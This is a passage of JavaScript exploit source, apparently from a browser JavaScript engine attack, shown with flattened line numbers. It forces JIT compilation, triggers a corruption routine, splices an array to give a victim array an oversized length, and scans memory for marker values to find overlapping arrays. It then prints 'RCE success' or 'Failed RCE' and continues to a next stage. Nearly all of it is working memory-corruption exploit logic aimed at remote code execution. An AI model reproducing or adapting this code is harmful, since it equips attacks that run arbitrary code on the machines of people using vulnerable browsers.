3428 } 3429 3430 otherGlobalObject.dontjitme_contigious(); 3431 dontjitme_float(); 3432 3433 return sleep(wait_for_jit_compilation_ms).then(() => { 3434 3435 let debug_1 = otherGlobalObject.domagic(); null; 3436 3437 the_oob_object.splice(30,0,1,2,3,4,5,6,7); 3438 3439 //now we should have a victim with a nice length. 3440 3441 var oob_array_idx = undefined; 3442 var overlap_array_idx = undefined; 3443 var overlap_idx_in_oob_array = undefined; 3444 var oob_array = undefined; 3445 3446 3447 const check_victim = () => { 3448 for (let j = 0; j < victim_cursor; j++){ 3449 if (victim_list[j].length > (victim_array_allocation_size*10)){ 3450 oob_array_idx = j; 3451 break; 3452 } 3453 } 3454 if(oob_array_idx === undefined){ 3455 return false; 3456 } 3457 oob_array = victim_list[oob_array_idx]; 3458 for (let i = 1; i < victim_array_allocation_size*10; i++){ 3459 if(oob_array[i+1] === egg1 && oob_array[i+2] === egg2){ 3460 overlap_array_idx = oob_array[i+3]; 3461 overlap_idx_in_oob_array = i-1; 3462 break; 3463 } 3464 } 3465 if(overlap_array_idx === undefined){ 3466 return false; 3467 } 3468 this.oob_array = oob_array; 3469 this.overlap_idx_in_oob_array = overlap_idx_in_oob_array + 1; 3470 this.overlap_array = victim_list[overlap_array_idx]; 3471 return true; 3472 } 3473 3474 let got_victim = check_victim(); 3475 if(!got_victim) 3476 { 3477 print("Failed RCE"); 3478 return false; 3479 } 3480 print("RCE success"); 3481 return this.stage1(); 3482 }); 3483 } 3484 } 3485 globalThis.check_attempt = check_attempt;